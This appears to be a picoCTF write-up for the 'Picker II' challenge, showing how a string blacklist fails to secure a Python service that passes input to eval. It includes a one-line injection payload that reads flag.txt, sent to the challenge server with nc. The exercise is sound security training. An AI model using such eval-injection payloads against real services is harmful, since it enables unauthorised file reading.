picoCTF Solutions
picoGym ExclusiveReverse EngineeringMedium

Picker II

Published: March 5, 2024Updated: December 9, 2025

Description

Picker II adds a simple blacklist so you cannot type win directly, but eval still executes arbitrary Python expressions. Abuse the file read inside win() yourself.

Setup

Python sandbox bypassDownload picker-II.py

Review picker-II.py to see the string blacklist that prevents submitting win.

Look at the win() helper; the first line reads flag.txt, and nothing stops you from doing the same.

wget https://artifacts.picoctf.net/c/523/picker-II.py
cat picker-II.py

Solution

  1. Step 1Copy the critical line
    Inside win(), the statement flag = open('flag.txt', 'r').read() loads the flag. Because user input still flows into eval, you can execute the exact same print call.
  2. Step 2Submit the payload remotely
    Connect to the remote host and paste print(open('flag.txt', 'r').read()). The service executes your code server-side and prints the flag.
    printf "print(open('flag.txt','r').read())\n" | nc saturn.picoctf.net 56771

Flag

picoCTF{f1l73r5_f41l_c0d3_r3f4c70r_m1gh7_5ucc3...44590}

Because the blacklist only checks for win, any other Python code that reads flag.txt still succeeds.